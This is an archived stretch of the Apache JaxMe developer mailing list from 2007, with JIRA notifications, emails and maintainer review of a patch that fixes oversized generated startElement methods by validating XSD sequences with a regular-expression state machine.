Priority: Critical Fix For: 0.5, 0.6 Using an XSD that has a complexType with ~50 child complexTypes in a sequen= ce, the generate Java code has a method startElement that is too large for = javac. Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I w= ill be attaching it to this issue. There are two patches. One for 5.2 and t= he other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:14:53 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25731 invoked from network); 29 Aug 2007 22:14:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:14:51 -0000 Received: (qmail 27429 invoked by uid 500); 29 Aug 2007 22:14:47 -0000 Delivered-To: [email protected] Received: (qmail 27404 invoked by uid 500); 29 Aug 2007 22:14:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27395 invoked by uid 99); 29 Aug 2007 22:14:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:14:46 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:14:50 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9309D71418F for <[email protected]>; Wed, 29 Aug 2007 15:14:30 -0700 (PDT) Message-ID: <2010193.1188425670582.JavaMail.jira@brutus> Date: Wed, 29 Aug 2007 15:14:30 -0700 (PDT) From: "Robert Eric Reeves (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.= jira.plugin.system.issuetabpanels:all-tabpanel ] Robert Eric Reeves updated JAXME-94: ------------------------------------ Attachment: veryLongSequences-patch-0.5.2.diff Patch for 0.5.2 > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:14:53 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25743 invoked from network); 29 Aug 2007 22:14:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:14:52 -0000 Received: (qmail 27556 invoked by uid 500); 29 Aug 2007 22:14:47 -0000 Delivered-To: [email protected] Received: (qmail 27528 invoked by uid 500); 29 Aug 2007 22:14:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27518 invoked by uid 99); 29 Aug 2007 22:14:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:14:47 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:14:51 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id BC399714204 for <[email protected]>; Wed, 29 Aug 2007 15:14:30 -0700 (PDT) Message-ID: <12083607.1188425670766.JavaMail.jira@brutus> Date: Wed, 29 Aug 2007 15:14:30 -0700 (PDT) From: "Robert Eric Reeves (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.= jira.plugin.system.issuetabpanels:all-tabpanel ] Robert Eric Reeves updated JAXME-94: ------------------------------------ Attachment: veryLongSequences-patch-0.6-SNAPSHOT.diff Patch for 0.6 > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:14:54 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25755 invoked from network); 29 Aug 2007 22:14:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:14:52 -0000 Received: (qmail 27664 invoked by uid 500); 29 Aug 2007 22:14:47 -0000 Delivered-To: [email protected] Received: (qmail 27625 invoked by uid 500); 29 Aug 2007 22:14:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27519 invoked by uid 99); 29 Aug 2007 22:14:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:14:47 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:14:50 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D6F7E71420D for <[email protected]>; Wed, 29 Aug 2007 15:14:30 -0700 (PDT) Message-ID: <7053549.1188425670878.JavaMail.jira@brutus> Date: Wed, 29 Aug 2007 15:14:30 -0700 (PDT) From: "Robert Eric Reeves (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.= jira.plugin.system.issuetabpanels:all-tabpanel ] Robert Eric Reeves updated JAXME-94: ------------------------------------ Attachment: test.xsd Test XSD to generate very large startElement method > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:16:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26386 invoked from network); 29 Aug 2007 22:16:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:16:55 -0000 Received: (qmail 31057 invoked by uid 500); 29 Aug 2007 22:16:51 -0000 Delivered-To: [email protected] Received: (qmail 31035 invoked by uid 500); 29 Aug 2007 22:16:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 31026 invoked by uid 99); 29 Aug 2007 22:16:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:16:51 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:17:51 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 510A7714204 for <[email protected]>; Wed, 29 Aug 2007 15:16:31 -0700 (PDT) Message-ID: <26422260.1188425791329.JavaMail.jira@brutus> Date: Wed, 29 Aug 2007 15:16:31 -0700 (PDT) From: "Robert Eric Reeves (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.j= ira.plugin.system.issuetabpanels:comment-tabpanel#action_12523718 ]=20 Robert Eric Reeves commented on JAXME-94: ----------------------------------------- The following is an email from Jose that describes his approach to his patc= h: I sent you an attachment with the patch that solves the problem of the huge= size in the classes that parse sequences (in addition, it solves an existi= ng problem with multiplicities other than 0..required for minOccurs and 1..= unbounded for maxOccurs, some unit test created)=20 As I told you yesterday, the class to parse a sequence with 250 optional el= ements was around 290.000 lines long before applying the optimization, and = now the class to parse the same sequence is around 4.000 lines. I have elaborated a bit more the concept of a state machine that was underl= ying in the existing code to validate the structure of elements in the sequ= ence, using regular expressions. My first approach was moving all the logic that decides if the received ele= ment is valid in the current state to a table of transitions. It worked but= I still didn't like the solution, because, while the code that takes the d= ecision was reduced dramatically, the code to initialize the table with all= the states and transitions became huge, and the class was still 40.000 lin= es long (better than 290.000 but still not good). Besides, the table of tra= nsitions was very memory consumpting. Then I remembered that a a deterministic finite state machine can always b= e represented by a regular expression and then all the table stuff could be= substituted by generating an adequate RE. For example:=20 =20 <xsd:sequence>=20 <xsd:element name=3D"nolessthan3" minOccurs=3D"3" maxOccurs=3D "unbounded" = type=3D"xsd:string"/> <xsd:element name=3D"nomorethan3" minOccurs=3D"0" maxOccurs=3D "3" type=3D"= xsd:string"/> <xsd:element name=3D"between3and5" minOccurs=3D"3" maxOccurs= =3D "5" type=3D"xsd:string"/> </xsd:sequence> If we assign symbols to the elements ("nolessthan3" --> 0, "nomorethan3" -= -> 1, "between3and5" --> 2), then a XML that follows this XSD could be vali= dated using the regular expression 0{3,}1{0,3}2{3,5} This works smoothly and all the tests that comes with JaxMe keep passing. I= have also tried the modification with the XSDs and XMLs of our project wit= hout apparent problems. I could even have reduced more the code, but there = is a lot of information about the elements that is available only at "gener= ating classes time" but it is not at "parsing time" and changing it would b= e very difficult only to save a few lines.=20 The patch is intended to be applied over a fresh 0.5.2 or 0.6-SNAPSHOT(trun= k) version (without my previous patch). > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 29 22:40:55 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33825 invoked from network); 29 Aug 2007 22:40:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2007 22:40:54 -0000 Received: (qmail 65102 invoked by uid 500); 29 Aug 2007 22:40:50 -0000 Delivered-To: [email protected] Received: (qmail 65080 invoked by uid 500); 29 Aug 2007 22:40:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 65071 invoked by uid 99); 29 Aug 2007 22:40:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 15:40:50 -0700 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=HTML_MESSAGE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO server107.appriver.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Aug 2007 22:41:41 +0000 Received: by server107.appriver.com (CommuniGate Pro PIPE 5.1.11) with PIPE id 91012469; Wed, 29 Aug 2007 18:40:23 -0400 Received: from [161.129.204.104] (HELO fe09.exg3.exghost.com) by server107.appriver.com (CommuniGate Pro SMTP 5.1.11) with ESMTP id 91012422 for [email protected]; Wed, 29 Aug 2007 18:40:12 -0400 Received: from BE18.exg3.exghost.com ([161.129.204.104]) by fe09.exg3.exghost.com with Microsoft SMTPSVC442.909.4238); Wed, 29 Aug 2007 18:38:58 -0400 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C7EA8D.63ABA086" Subject: PATCH - fix for large startElement method Date: Wed, 29 Aug 2007 18:41:23 -0400 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: PATCH - fix for large startElement method Thread-Index: Acfqjbm01eRx6fz3Rw2/BrqO51OTZw== From: "Robert Reeves" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 29 Aug 2007 22:38:58.0394 (UTC) FILETIME=[637F8BA0:01C7EA8D] X-Policy: GLOBAL X-Primary: [email protected] X-Note: This Email was scanned by AppRiver SecureTide X-ALLOW: [email protected] ALLOWED X-Note: Spam Tests Failed: X-Country-Path: UNITED STATES->UNITED STATES->UNITED STATES X-Note-Sending-IP: 161.129.204.104 X-Note-Reverse-DNS: fe09.exg3.exghost.com X-Note-WHTLIST: [email protected] X-Note: User Rule Hits: X-Note: Global Rule Hits: 70 80 X-Note: Mail Class: ALLOWEDSENDER X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C7EA8D.63ABA086 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, =20 I have created a new Improvement issue in Jira. It can be found here: = https://issues.apache.org/jira/browse/JAXME-94 =20 As some of you may recall, I sent an email to this list requesting help = in providing a fix for this problem. Jose Luis Huertas Fern=E1ndez = agreed to take on the challenge and has provided two patches to fix the = issue (one for 0.5.2 and the other for 0.6). I have attached those = patches to the issue for your approval. (Thanks, Jose!) =20 Phurnace is committed to doing more than just 'supporting' open source = projects. We believe that the JaxMe project is an integral part of our = market value proposition. The one other JAXB implementation is licensed = prohibitively for a large number of our customers. Specifically, these = customers wish to distribute Phurnace Deliver to their customers, but do = not wish to distribute Sun code.=20 =20 As such, the health and continued improvement of the JaxMe project is = absolutely imperative to the success of Phurnace. Thus, we are more than = willing to pay developers to continually improve the project. However, = instead of just keeping the improvements to ourselves, we wish to = contribute them to code base so that all others can benefit, even our = competitors. =20 Finally, Phurnace would not be as successful as we are without the hard = work and technical achievement that Jochen has provided. Thank you, = Jochen. =20 Onward, =20 Robert Reeves ------_=_NextPart_001_01C7EA8D.63ABA086 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns:x=3D"urn:schemas-microsoft-com:office:excel" = xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <meta name=3DGenerator content=3D"Microsoft Word 12 (filtered medium)"> <style> <!-- /* Font Definitions */ @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:11.0pt; font-family:"Calibri","sans-serif";} a:link, span.MsoHyperlink {mso-style-priority:99; color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {mso-style-priority:99; color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:"Calibri","sans-serif"; color:windowtext;} .MsoChpDefault {mso-style-type:export-only;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in;} div.Section1 {page:Section1;} --> </style> <!--[if gte mso 9]><xml> <o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" /> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext=3D"edit"> <o:idmap v:ext=3D"edit" data=3D"1" /> </o:shapelayout></xml><![endif]--> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal>Hello,<o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>I have created a new Improvement issue in Jira. It = can be found here: <a = href=3D"https://issues.apache.org/jira/browse/JAXME-94">https://issues.ap= ache.org/jira/browse/JAXME-94</a><o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>As some of you may recall, I sent an email to this = list requesting help in providing a fix for this problem. Jose Luis Huertas Fern=E1ndez agreed to take on the challenge and has provided two patches = to fix the issue (one for 0.5.2 and the other for 0.6). I have attached those = patches to the issue for your approval. (Thanks, Jose!)<o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>Phurnace is committed to doing more than just &#8216;supporting&#8217; open source projects. We believe that the JaxMe project is an integral part of our market value proposition. The one = other JAXB implementation is licensed prohibitively for a large number of our = customers. Specifically, these customers wish to distribute Phurnace Deliver to = their customers, but do not wish to distribute Sun code. <o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>As such, the health and continued improvement of = the JaxMe project is absolutely imperative to the success of Phurnace. Thus, we = are more than willing to pay developers to continually improve the project. = However, instead of just keeping the improvements to ourselves, we wish to = contribute them to code base so that all others can benefit, even our = competitors.<o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>Finally, Phurnace would not be as successful as we = are without the hard work and technical achievement that Jochen has = provided. Thank you, Jochen.<o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>Onward,<o:p></o:p></p> <p class=3DMsoNormal><o:p>&nbsp;</o:p></p> <p class=3DMsoNormal>Robert Reeves<o:p></o:p></p> </div> </body> </html> ------_=_NextPart_001_01C7EA8D.63ABA086-- From [email protected] Fri Aug 31 06:52:56 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57677 invoked from network); 31 Aug 2007 06:52:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Aug 2007 06:52:56 -0000 Received: (qmail 88398 invoked by uid 500); 31 Aug 2007 06:52:51 -0000 Delivered-To: [email protected] Received: (qmail 88369 invoked by uid 500); 31 Aug 2007 06:52:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 88360 invoked by uid 99); 31 Aug 2007 06:52:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Aug 2007 23:52:51 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 31 Aug 2007 06:53:54 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CE2FD714211 for <[email protected]>; Thu, 30 Aug 2007 23:52:30 -0700 (PDT) Message-ID: <22962641.1188543150841.JavaMail.jira@brutus> Date: Thu, 30 Aug 2007 23:52:30 -0700 (PDT) From: "Jochen Wiedmann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.= jira.plugin.system.issuetabpanels:all-tabpanel ] Jochen Wiedmann reassigned JAXME-94: ------------------------------------ Assignee: Jochen Wiedmann > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Assignee: Jochen Wiedmann > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Aug 31 06:58:52 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58477 invoked from network); 31 Aug 2007 06:58:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Aug 2007 06:58:52 -0000 Received: (qmail 92902 invoked by uid 500); 31 Aug 2007 06:58:47 -0000 Delivered-To: [email protected] Received: (qmail 92878 invoked by uid 500); 31 Aug 2007 06:58:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 92869 invoked by uid 99); 31 Aug 2007 06:58:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Aug 2007 23:58:47 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 31 Aug 2007 06:58:50 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6F249714191 for <[email protected]>; Thu, 30 Aug 2007 23:58:30 -0700 (PDT) Message-ID: <25939659.1188543510446.JavaMail.jira@brutus> Date: Thu, 30 Aug 2007 23:58:30 -0700 (PDT) From: "Jochen Wiedmann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JAXME-94) startElement method larger than 64KB when using a large amount of complexType's In-Reply-To: <27416760.1188425552241.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JAXME-94?page=3Dcom.atlassian.j= ira.plugin.system.issuetabpanels:comment-tabpanel#action_12524019 ]=20 Jochen Wiedmann commented on JAXME-94: -------------------------------------- Had some time yesterday to inspect it. My first impressions: - This won't make it into the maintenance branch. Although the test suite runs fine, I would still consider this as a disruptive change. Such chan= ges are reserved for the unstable branch. - I have a couple of performance issues. Some of them are basically nitpick= s, but at least two of them are serious: * The regular expression pattern can be generated by the generator. It doesn't need to be [email protected]. * The map and the compiled pattern can be static and created when the cla= ss is loaded. Question to Jose: Do you prefer to fix this for yourself or do you want me = to change this? > startElement method larger than 64KB when using a large amount of complex= Type's > -------------------------------------------------------------------------= ------ > > Key: JAXME-94 > URL: https://issues.apache.org/jira/browse/JAXME-94 > Project: JaxMe > Issue Type: Improvement > Components: JaxMe Core > Affects Versions: 0.5, 0.6 > Environment: All > Reporter: Robert Eric Reeves > Assignee: Jochen Wiedmann > Priority: Critical > Fix For: 0.5, 0.6 > > Attachments: test.xsd, veryLongSequences-patch-0.5.2.diff, veryLo= ngSequences-patch-0.6-SNAPSHOT.diff > > > Using an XSD that has a complexType with ~50 child complexTypes in a sequ= ence, the generate Java code has a method startElement that is too large fo= r javac. > Jose Luis Huertas Fern=C3=A1ndez has created a patch to fix this error. I= will be attaching it to this issue. There are two patches. One for 5.2 and= the other for 6.0. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Tue Aug 31 02:11:26 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61356 invoked from network); 31 Aug 2004 02:11:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Aug 2004 02:11:25 -0000 Received: (qmail 34430 invoked by uid 500); 31 Aug 2004 02:11:24 -0000 Delivered-To: [email protected] Received: (qmail 34388 invoked by uid 500); 31 Aug 2004 02:11:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> List-Id: "Excalibur Users List" <user.excalibur.apache.org> Reply-To: "Excalibur Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 34375 invoked by uid 99); 31 Aug 2004 02:11:24 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 